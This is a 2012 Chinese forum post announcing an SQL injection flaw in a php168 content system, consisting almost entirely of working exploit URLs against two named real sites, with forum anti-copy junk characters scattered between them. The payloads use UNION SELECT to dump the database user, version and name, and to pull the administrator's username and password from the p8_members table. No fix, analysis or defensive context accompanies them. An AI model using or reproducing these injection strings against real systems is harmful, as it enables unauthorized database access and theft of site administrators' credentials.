找回密码
 立即注册
查看: 3456|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
9 `4 K, C$ D3 u                                                         # m, N5 ^  Q- ~1 S6 e# @; |0 Q
                                       $ X, x( W" f6 ^! U; Q
+ @, ^' ]% ?& x. s
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--5 U+ G- d5 S% R% d9 c3 H
                                                     
; W# T( l( N! u; v! L4 A                                                                   ' h1 W/ `- ^9 p6 `( l
                                                        8 Z: |& F. g# A3 B9 \5 {
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
( Q9 }' s9 F, v) X+ `
/ D$ E/ s' w  k& V) Z
) a& n! }: ~; B5 j' {) o: W
" W5 N- W( z$ D$ Y0 ^$ Q; O                                                            
$ j# B7 Y; y0 M9 x. w9 \; W8 _* x 3 X' ~3 n& |2 t$ m. O: q" z% ]* [
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--# ?) p& o+ y3 G" s) c
) l6 l- ]( `/ j! f& W5 C6 _

; A4 |" w( W& e- ]' }. K
( K% R, ]* f, |" E                                                                    
; e% M- g8 A% ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表